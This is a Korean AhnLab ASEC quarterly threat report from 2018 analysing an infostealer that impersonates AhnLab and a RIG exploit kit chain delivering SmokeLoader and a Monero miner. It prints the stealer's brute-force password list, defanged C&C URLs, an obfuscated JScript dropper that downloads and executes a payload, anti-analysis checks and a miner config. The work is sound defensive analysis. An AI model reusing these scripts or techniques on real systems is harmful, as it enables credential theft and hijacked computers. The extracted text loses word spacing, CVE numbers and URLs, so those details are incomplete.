ASEC REPORT VOL 년 3 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안

Transcription

1

2 ASEC REPORT VOL 년 3 분기 ASEC(AhnLab Security Emergency response Center, 안랩시큐리티대응센터 ) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC에서작성하며, 주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 더많은정보는안랩닷컴 (www. ahnlab.com) 에서확인하실수있습니다 년 3 분기보안동향 Table of Contents 보안이슈 SECURITY ISSUE 시스템및계정정보탈취하는인포스틸러 악성코드 04 악성코드상세분석 ANALYSIS-IN-DEPTH 리그익스플로잇킷을이용한암호화폐채굴 악성코드 12 ASEC REPORT Vol.92 Security Trend 2

3 보안이슈 SECURITY ISSUE 시스템및계정정보탈취하는 인포스틸러악성코드

4 시스템및계정정보 보안이슈 Security Issue 탈취하는인포스틸러 악성코드 2018 년 3 분기에도감염시스템의정보유출을목적으로하는 인포스틸러 (Infostealer) 류의악성코 드가다수확인되었다. 인포스틸러악성코드는감염시스템의로그인계정정보와웹브라우저, FTP 등의응용프로그램에대한정보를탈취한다. 지난 3분기에유포된다수의인포스틸러악성코드중파일의등록정보를신뢰할수있는업체의것으로위장하여유포된사례가발견됐다. 안랩시큐리티대응센터 (AhnLab Security Emergencyresponse Center, 이하 ASEC) 의분석결과, 해당인포스틸러악성코드의형태와주요기능은지난 2015 년에발견된것과동일하지만보안솔루션의탐지를피하기위해더욱고도화된것으로확인됐다. 이보고서에서는신뢰할수있는업체를사칭해시스템 ( 사용자 ) 정보탈취를시도하는인포스틸러악 성코드의유포방식과주요기능, 대응방안을상세히살펴본다. 01. 유포방식 [ 그림 1-1] 은시스템정보를탈취하는악성파일의등록정보로, 공격자는국내사용자들에게익숙한안랩 (AhnLab) 의프로그램인것처럼위장했다. 해당파일의정확한유포방식은확인되지않았다. 그러나지난 2015년에발견된인포스틸러악성코드는메일의첨부파일형태로워드문서파일이나화면보호기파일 (*.scr 확장자 ) 등으로유포된바있다. ASEC REPORT Vol.92 Security Trend 4

5 해당파일은 aplib라는오픈소스알고리즘을사용하여주요코드들이패킹 (Packing) 되어있으며, [ 그림 1-1] 에서볼수있는것처럼비주얼베이직 6.0(Visual Basic 6.0) 프로그램을이용해제작됐다. 비주얼베이직컴파일러를사용했기때문에정적분석만으로는악성여부를판단하기어려운구조를갖고있다. 최근비주얼베이 그림 1-1 악성코드등록정보및외형정보 직 6.0 프로그램으로제작된악성코드가종종확 인되고있는데, 이는보안솔루션의탐지를피하고코드를은닉하기위함이다. 대표적으로헤르메스 (Hermes) 랜섬웨어나갠드크랩 (GandCrab) 랜섬웨어등을예로들수있다. 한편, 비주얼베이직 6.0 프로그램으로제작된이악성파일내부에는 포니 (Pony) 와 로키 - 봇 (Loki-Bot) 등의이름으로알려진계정정보탈취 (Infostealer) 기능이존재한다. 02. 주요기능및동작방식 1) 윈도우로그인정보탈취윈도우로그인정보를탈취하는인포스틸러는사용자의윈도우로그인계정및 Guest, Administrator 등운영체제에등록된계정별목록 (NetUserEnum) 정보를읽어온다. 이후 LogonUserA 라는 API를사용하여 [ 그림 1-2] 와같이악성코드내부에저장된패스워드리스트들을대입하는방식으로공격을시도한다. 그림 1-2 Guest 계정에 패스워드대입 ASEC REPORT Vol.92 Security Trend 5

6 [ 표 1-1] 은해당인포스틸러가대입하는패스워드리스트를정리한것이다 angel george jesus1 rotimi tigger corvette michael 1111 angels ginger nicole rotimi trinity creative michelle anthony google nintendo samantha trustno1 creative mickey apple grace nothing secret viper dakota monkey asdf guitar online shadow welcome daniel mother 1234 asdfgh hahaha orange shalom whatever diamond muffin ashley hannah pass silver william digital mustang asshole happy passw0rd single winner dragon myspace austin harley password slayer wisdom eminem bailey heaven password1 slayer wisdom enter bandit hello peace smokey benjamin jordan 123abc baseball hello1 peanut snoopy biteme joseph 1q2w3e batman helpme pepper soccer blahblah joshua faith hockey phpbb soccer1 blessed junior foobar hope pokemon sparky blessing justin 7777 foobar hunter poop spirit buster killer football iloveyou power starwars canada knight aaaaaa forever iloveyou! princess summer charlie letmein abc123 freedom iloveyou1 purple sunshine cheese looking adidas friends iloveyou2 qazwsx superman chicken love adidas fuckyou internet qwerty taylor chris lovely admin fuckyou1 jasmine qwerty1 test christ lucky amanda gateway jennifer rachel testing compaq maggie andrew genesis jessica rainbow thomas computer master matthew merlin jesus robert thunder cookie matrix 표 1-1 공격시대입하는패스워드리스트 2) 브라우저및응용프로그램로그인정보탈취인포스틸러악성코드는윈도우로그인정보뿐만아니라브라우저에저장된로그인정보파일에접근해특정 URL에대한사용자의아이디와비밀번호정보를유출하는기능을갖고있다. [ 그림 1-3] 은악성코드내부에유출대상이 되는응용프로그램목록이다. 일반적으로많이 그림 1-3 계정탈취대상프로그램목록 ASEC REPORT Vol.92 Security Trend 6

7 사용하는인터넷익스플로러 (Internet Explorer), 파이어폭스 (FireFox), 크롬 (Chrome), 오페라 (Opera) 등의웹브라우저뿐아니라다양한 FTP 및원격제어프로그램들이유출대상에포함되 어있다. 파이어폭스브라우저의경우, [ 그림 1-4] 와같이 SHRegGetValueW API 인자로레지스트리의 내용을통해프로그램경로및버전을확인하는루틴이존재하는것을확인했다. 이는파이어폭스 의복호화루틴이다른브라우저들과상이하다는것을의미한다. 그림 1-4 프로그램경로및버전확인하는루틴 또한파이어폭스브라우저의버전이 32.0 미만인경우 [ 그림 1-5] 와같이악성코드내부에저장된 쿼리 (Query) 문을이용해암호화된내용을가져오고 sqlite3.dll, mozsqlite3.dll, nss3.dll 의 API 를사용해복호화시킨다. 그림 1-5 쿼리문및복호화된 ID 정보 ( 파이어폭스버전 32.0 미만인경우 ) ASEC REPORT Vol.92 Security Trend 7

8 ASEC 분석결과, 크롬브라우저의경우에도위와유사한동작을반복하면 [ 그림 1-6] 과같이모두 복호화된다. 현재최신버전인파이어폭스브라우저 63.0 버전에서는사용자정보저장방식이변경됨에따라 (signons.sqlite logins.json) 위와같은공격기법이더이상유효하지않음이확인되었다. 그러나복호화툴이이미인터넷에공개되어있어향후추가변종이나타날가능성이있는만큼, 최신버전의브라우저를사용하는경 그림 1-6 브라우저별계정정보탈취 우라도사용자의주의가요구된다. 3) FTP 정보탈취이번에발견된인포스틸러악성코드는윈도우로그인정보와브라우저의계정정보뿐만아니라 FTP 클라이언트의세션값이들어있는기본디렉토리에접근하여세션정보를탈취한다. 국내업체에서제작한원격접속프로그램인 XFTP 프로그램이 5버전이하인경우, [ 그림 1-7] 과같이기본디렉토리를고정한뒤 xfp 확장자파일을읽어오는것을확인했다. (*.xfp : XFTP의세션값정보파일 ) 분석결과, 현재배포된 XFTP 6버전부터는세션값의기본경로가 Documents\Net- Sarang Computer\6\Xftp\Sessions 로변경되어해당공격기법이유효하지않음이확인 되었다. 그림 1-7 Xftp 정보유출관련 ASEC REPORT Vol.92 Security Trend 8

9 03. 탈취정보전송 인포스틸러악성코드는최종적으로유출한사용자정보들을 C&C 서버로전송한다. [ 그림 1-8] 은 C&C 서버로전송된통신패킷의일부이다. 그림 1-8 C&C 서버와의통신패킷 또한해당악성코드가접속한 C&C 서버는 [ 표 1-2] 와같이정상 URL 인 1)singatrading.com 과 2)xsftruss.com 과유사하게제작되었음이확인됐다. 정보탈취악성코드 포니 (Pony) 로키 - 봇 (Loki-Bot) C&C 서버주소 hxtp://singatradeing.com/kml/coreserver/gate.php hxtp://xsftruss.ml/kceenewold/fre.php 표 1-2 C&C 서버 04. 대응방안 V3 제품군에서는해당인포스틸러악성코드를다음과같은진단명으로탐지하고있다. <V3 제품군진단명 > - Trojan/Win32.Inject ( ) - Trojan/Win32.Kryptik ( ) ASEC REPORT Vol.92 Security Trend 9

10 - Trojan/Win32.Cloxer ( ) 최근안랩을비롯해신뢰할수있는업체를사칭하거나유명프로그램으로위장한악성코드가지속 적으로유포되고있다. 이번에발견된인포스틸러악성코드사례에서볼수있는것처럼파일의등 록정보에신뢰할수있는업체명등이포함되어있는경우에도사용자의각별한주의가필요하다. 이러한인포스틸러악성코드로인한피해를예방하기위해서는평소에도개인정보유출에유의해 야한다. 특히시스템비밀번호설정시단조로운숫자나열등의방식은지양해야한다. 또한앞서살펴본바와같이인포스틸러악성코드는브라우저의취약점을이용하는것이아니라브라우저내부의로그인정보파일에접근해저장된아이디와패스워드를유출한다. 따라서인포스틸러가개인정보를탈취하는것을미연에방지하려면웹페이지로그인시아이디와패스워드등의계정정보를저장하여자동으로입력해주는자동완성기능을사용하지않는것이바람직하다. ASEC REPORT Vol.92 Security Trend 10

11 악성코드 상세분석 ANALYSIS-IN-DEPTH 리그익스플로잇킷을이용한 암호화폐채굴악성코드

12 리그익스플로잇킷을 악성코드상세분석 Analysis-In-Depth 이용한암호화폐채굴 악성코드 지난연말부터사용자몰래시스템의리소스를이용해암호화폐 (Cryptocurrency, 가상화폐 ) 를채굴 (Mining) 하는, 이른바마이너 (Miner) 악성코드가지속적으로증가하고있다. 최근에는랜섬웨어제작및유포에도이용된바있는리그익스플로잇킷 (RIG Exploit Kit) 과스모크로더 (SmokeLoader) 를이용한암호화폐채굴악성코드가확인됐다. 리그익스플로잇킷은다양한취약점을이용하여악성프로그램을유포하는기능을제공한다. 스모크로더는 C&C 서버를통해공격자의명령에따라추가악성코드를다운로드하는악성코드로, 초기에는정보유출을목적으로했으나이후랜섬웨어를다운로드한데이어최근에는암호화폐채굴악성코드를다운로드하고있다. 안랩시큐리티대응센터 (ASEC) 는리그익스플로잇킷을이용한암호화폐채굴악성코드의취약점공 격부터쉘코드동작등일련의공격과정을상세히분석했다. 01. 유포방식공격자는암호화폐중하나인모네로 (Monero) 를채굴하기위해리그익스플로잇킷과인터넷익스플로러 (IE) 의 CVE 취약점을이용해암호화폐채굴악성코드를유포했다. CVE 취약점은윈도우 VB 스크립트엔진의원격코드실행취약점으로, 최근악용사례가빈번하게보고되고있다. ASEC REPORT Vol.92 Security Trend 12

13 이번에발견된암호화폐채굴악성코드의경우, 보안이취약한웹사이트나온라인광고사이트를악 용하는멀버타이징 (Malvertising) 기법을이용해스모크로더를다운로드및실행하여모네로채굴프 로그램 (Monero Miner) 을추가로설치해암호화폐를채굴했다. 해당악성코드의전체적인동작방식은 [ 그림 2-1] 과같다. 02. 동작과정 1) 리그익스플로잇킷 (RIG Exploit Kit) 을이용한취약점공격사용자가최신보안패치가적용되지않은웹브라우저를이용해손상된웹사이트에접속하거나안전하지않은광고페이지를접속하면 CVE 취약점을이용해공격이시도된다. 공격과정 그림 2-1 암호화폐채굴악성코드공격과정 은 [ 그림 2-2] 와같이총 4 단계로진행된다. 1 단계 : 랜딩페이지 (Landing page) 로이동 HTTP 헤더에포함된로케이션 (Location) 정보에 의해자동으로 로이동한다. 2 단계 : 취약점공격사이트이동 에서수신한 HTML 에 는 <iframe src= width= 1 height= 1 style= position:ab- 그림 2-2 취약점공격과정 ASEC REPORT Vol.92 Security Trend 13

14 solute:left:-1px; ><iframe> 과같은 <iframe> 태그가포함되어있다. 해당태그에의해사용자화 면에보이지않게취약점공격사이트 ( 에접속한다. 3단계 : 취약점공격명령실행취약점공격사이트에서수신한 HTML에는취약점공격효과를높이기위해 CVE , CVE , CVE 취약점을공격하는 3개의공격코드가모두포함되어있다. 각공격코드는순차적으로실행되며, 해당취약점과관련된패치가적용되어있지않은경우해당취약점이발현되어악성파일을다운로드하고실행하는쉘코드가실행된다. 4단계 : 취약점공격파일다운로드및실행 3가지취약점중 CVE 은어도비플래시플래이어 (Adobe Flash Player) 의취약점으로, 이를이용한공격시플래시파일이추가로필요하다. 따라서이파일을취약점공격사이트에서추가로다운로드하고실행한다. [ 그림 2-3] 은 CVE 취약점공격과정이다. 그림 2-3 CVE 취약점공격과정 ASEC REPORT Vol.92 Security Trend 14

15 2) 스모크로더 (SmokeLoader) 다운로드및실행앞서살펴본과정을거쳐취약점공격에성공하여웹브라우저제어가가능해지면, 웹브라우저에서쉘코드를실행하여스모크로더악성파일을다운로드하고실행한다. 쉘코드는각취약점별로제작되어있다. [ 그림 2-4] 는 CVE 취약점공격에사용된쉘코드의모습이다. 그림 2-4 CVE 취약점공격에사용된쉘코드 이쉘코드가실행되면 [ 그림 2-5] 와같이스크 립트정보를인수로포함한 CMD 프로그램이실 행된다. CMD 프로그램이실행되면 [ 그림 2-6] 과같이추가로실행될스크립트명령을 %TEMP%\T32. tmp 파일에저장하고, WSCRIPT(Windows Script) 프로그램을이용하여파일을실행한다. 해당스크립트명령에는스모크로더악성프로그 램을웹서버에서다운로드하고실행하는명령이 포함되어있다. 그림 2-5 쉘코드에의해 CMD 프로그램이실행되는모습 ASEC REPORT Vol.92 Security Trend 15

16 function _(k,e){for(var l=0,n,c=[],f=255,s=string,q=[],b=0;256^>b;b++)c[b]=b;ta="char"+"codeat";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.le ngth)^&f,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&f,l=l+c[b]^&f,n=c[b],c[b]=c[l],c[l]=n,q.push(s.fromcharcode(k. charcodeat(p)^^c[c[b]+c[l]^&f]));return q["join"]("")};/**/function V(k){var y=a(e+"."+e+/**/"reques\x74.5.1");t="g";y["se"+"tproxy"] (n);y["o"+"pen"](t+"et",k(1),1);y.option(n)=k(2);y.send();y["wai"+"tforresponse"]();w="respo"+"nsetext";if(40*5==y.status)return _ (y[w],k(n))};try{m="wsc";u=this[m+"ript"],o="object";p=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U=" DEleTefIle",a=Function/**/("QW","return u.create"+o+"(qw)"),q=a(p+"ing.filesystem"+o),s=a("ado"+"db.stream"),j=a("w"+p+". Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso ";try{v=V(m)} catch(w){v=v(m)};q="pe\x00\x00";d=v.charcodeat(21+v[m](q));s.open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.writetext(v);s. savetofile(x,2);c=" /c ";s.close();i="regs";z^&^&(x=i+"vr32"+e+" /s "+x);j["run"](z+e+c+x,0)}catch(ee){};q[u](k); 그림 2-6 쉘코드에의해실행되는스크립트명령 3) 스모크로더의모네로채굴프로그램 (Monero Miner) 다운로드쉘코드에의해실행되는스크립트는스모크로더를다운로드하고실행한다. 스모크로더는자신을레지스트리에등록시켜시스템을다시시작하더라도자동으로실행되도록하며, 주기적으로 C&C 서버에접속하여새로운악성파일을다운로드하고실행하는기능을가지고있다. 해당스모크로더는 NSIS 인스톨러로제작되었으며, 실행후다음과같이동작한다. (a) 실행환경검사 다음의조건을검사하여자신의실행을중단하거나대상프로그램을종료시킨다. - 윈도우버전검사 윈도우비스타 (Windows Vista) 이하의운영체제에서실행중이면자신을종료한다. - 가상머신 (Virtual Machine) 여부검사 HKLM\System\CurrentControlSet\Service\Disk\Enum\0 의값에 VMWARE, VIRTUAL, QEMU, ZEN 값이포함되었으면가상머신으로판단하고자신을종료한다. ASEC REPORT Vol.92 Security Trend 16

17 - 분석프로그램실행여부검사 OllyDbg, Process Explorer, Process Monitor, WinDbg, Cain & Abel, TCPView, Portmon, Wireshark 등분석프로그램의실행여부를프로세스목록및윈도우클래스 (Window Class) 목록에서확인한후대상프로그램을종료시킨다. (b) 자가복제 자신의파일을 %APPDATA%\Microsoft\Windows\[ 랜덤경로 ]\[ 랜덤파일명 ].exe 경로에복제한다. (c) 자동실행등록자동실행폴더에링크파일 (.LNK) 을생성하여, 시스템재부팅이후에도복제된파일이자동으로동작할수있게등록한다. %APPDATA%\Microsoft\Windows\Start Menu\programs\startup\[ 랜덤파일명 ].lnk (d) 인터넷접속가능여부확인 에접속을시도하여인터넷접속이가능한지확인한다. 접속 이불가능한경우 6 초대기후재접속을반복한다. (e) 신규악성프로그램다운로드 C&C 서버 ( 에접속하여신규악성프로그램을 %TEMP%\[ 랜덤경로 ]\wuauclt.exe 경로에다운로드하고실행한다. 최초 C&C 서버접속시에는 [ 그림 2-7] 과같이 POST 메소드로실행된시스템의디스크볼륨시리얼번호 (Disk Volume Serial Number), 윈도우버전 (Windows Version), 프로세스무결성수준 (Process Integrity Level) 등의정보를 RC4 알고리즘으로암호화하여전달한다. ASEC REPORT Vol.92 Security Trend 17

18 요청을받은 C&C 서버는 404 Not Found 로오류를응답한다. 이응답은요청된페이지가없을때사용되는오류코드이지만, 실제로는암호화된실행파일데이터가 Content-Length에지정된길이만큼반환된다. 스모크로더는이데이터를복호화하여 %TEMP% 에저장한후실행한다. 그림 2-7 C&C 서버요청내용및응답결과 이와같은 C&C 서버접속은 1 분마다반복하여 C&C 서버에서제공하는새로운악성프로그램을수시로다운로드하고실행한다. 4) 모네로채굴프로그램 (Monero Miner) 을이용한암호화폐채굴 이전과정에서살펴본것과같이스모크로더에의해다양한악성파일들이감염될수있지만, 최근공격 자는금전적이득을위해주로모네로채굴프로그램 (Monero Miner) 을다운로드하고이를실행시킨다. 모네로채굴프로그램역시 NSIS 인스톨러로제작되었으며, 실행후다음과같이동작한다. (a) 자가복제 자신의파일을 %APPDATA%\troop.exe 경로에복제한다. (b) 자동실행등록 다음레지스트리경로에복제한파일경로를등록하여시스템재부팅이후에도자동으로동작되도록한다. KEY: HKCU\Software\Microsoft\WindowsNT\CurrentVersion\Winlogon\shell VALUE: explorer.exe DATA: %APPDATA%troop.exe ASEC REPORT Vol.92 Security Trend 18

19 (c) XMRig 프로그램실행 %WINDIR%\system32\wuapp.exe 프로그램을다음과같이실행한다. %WINDIR%\system32\wuapp.exe -c C:\ProgramData\BJSTjWTTyY\cfg Wuapp.exe 프로그램은 Windows Update Application Launcher 정상프로그램이다. 모네로채굴프로그램 (Monero Miner) 은해당정상프로그램을실행하고, 자신의코드를인젝션 (Injection) 한후실행시킴으로써사용자가감염사실을알수없도록한다. 모네로채굴프로그램 (Monero Miner) 이인젝션하는코드는오픈소스프로그램인 XMRig 프로그램 (2.5.0 버전 ) 이다. 메모리분석시탐지되지않도록 [ 그림 2-8] 과같이 PE 파일의일부헤더 정보를제거한 UPX 형태로제작되어있다. 그림 2-8 PE 헤더정보일부가제거된메모리영역정보 인수로전달된 RIGXMR 의설정파일내용은 [ 그림 2-9] 와같다. { "algo": "cryptonight", "background": false, "threads": 1, "pools": [ { "url": "sg.minexmr.com:4444", "user":"46j2g9rmhwrutfncsxjfd8bgn1jnznhntd2dngxv5x2z6bfshljj9pz49ke ahgrixagrctovdgrjppnnbyhp9ez2llb5ypt", "pass": "x", } 그림 2-9 C:\ProgramData\BJSTjWTTyY\cfg 내용일부 ASEC REPORT Vol.92 Security Trend 19

20 모네로채굴프로그램은암호화폐채굴시한개의쓰레드와 sg.mimexmr.com:4444 를마이닝풀 (Mining Pool) 로사용한다. 해당마이닝풀은싱가폴에위치한서버이며, 낮은수준의 CPU/ GPU 를사용하도록설정된포트이다. 감염된 PC의사용자가암호화폐채굴프로그램이실행중인것을인지하지못하도록시스템자원을적게사용하도록설정되어있다. 안랩의분석당시, 설정파일의 유저 (user) 정보를조회하면 [ 그림 2-10] 과같이 minexmr.com 사이트에서부정사용계정으로차단되어있어현재는암호화폐채굴이불가한것으로확인됐다. 그림 2-10 사용이정지된계정상태 03. 대응방안 안랩이분석한리그익스플로잇킷기반의암호화폐채굴악성코드와관련된파일들의정보는다 음과같으며, 각각 V3 제품을이용해탐지할수있다. 파일명파일타입파일크기 MD5 SHA2 0f9cdcb4c2527dfe77fd htm Script 141,243 Bytes 0f9cdcb4c2527dfe77fd b3d38e56e7e311a48256e1c4fc65415a80e63e5d f8b7b b610 V3 진단명 ( 반영엔진버전 ) Trojan/JS.Exploitloader / ASEC REPORT Vol.92 Security Trend 20

21 파일명파일타입파일크기 MD5 SHA2 e476a13d5706f369a9fff0d7a606f245.swf Adobe Flash Player File (SWF) 34,281 Bytes e476a13d5706f369a9fff0d7a606f245 bc1fd88bba6a497df68a b5ca7306cd94bbea692287eb8b59bd24156b4 V3 진단명 ( 반영엔진버전 ) SWF/Cve Exp.3 / 파일명파일타입파일크기 MD5 SHA2 457e8e14761b54d f622d7cd0b(SmokeLoader).exe Portable Executable (PE) 139,706 Bytes 457e8e14761b54d f622d7cd0b 66e4e472da1b128b6390c6cbf04cc70c0e873b60f52eabb1b4ea74ebd119df18 V3 진단명 ( 반영엔진버전 ) Trojan/Win32.HDC / 파일명파일타입파일크기 MD5 SHA2 f160cfb4c09ea000066f84be487a1a76(monerominer).exe Portable Executable (PE) 932,075 Bytes f160cfb4c09ea000066f84be487a1a76 716a65e4b63e442756f63e3ac0bb971ee007f0bf9cf251b9f0bfd84e V3 진단명 ( 반영엔진버전 ) Trojan/Win32.Infostealer / 이번에발견된암호화폐채굴악성코드는암호화폐채굴을목적으로제작 유포되었지만감염과 정에서실행되는스모크로더는다양한목적으로사용될수있는다운로더 (downloader) 이다. 즉, 공격자의의도에따라랜섬웨어나백도어의설치가가능하기때문에각별한주의가필요하다. 또한이번사례와같이취약점을이용한악성코드제작및유포가지속적으로발생하고있다. 암호화폐채굴악성코드는물론, 랜섬웨어등악성코드감염을예방하기위해서는사용중인운영체제및주요애플리케이션 ( 소프트웨어 ) 의최신패치를적용하는한편, 의심스러운웹사이트방문을삼가는것이바람직하다. ASEC REPORT Vol.92 Security Trend 21

22 04. 참고자료 1. 랜섬웨어가이용하는멀버타이징기법 dist=2&seq= CVE 취약점정보 ASEC REPORT Vol.92 Security Trend 22

23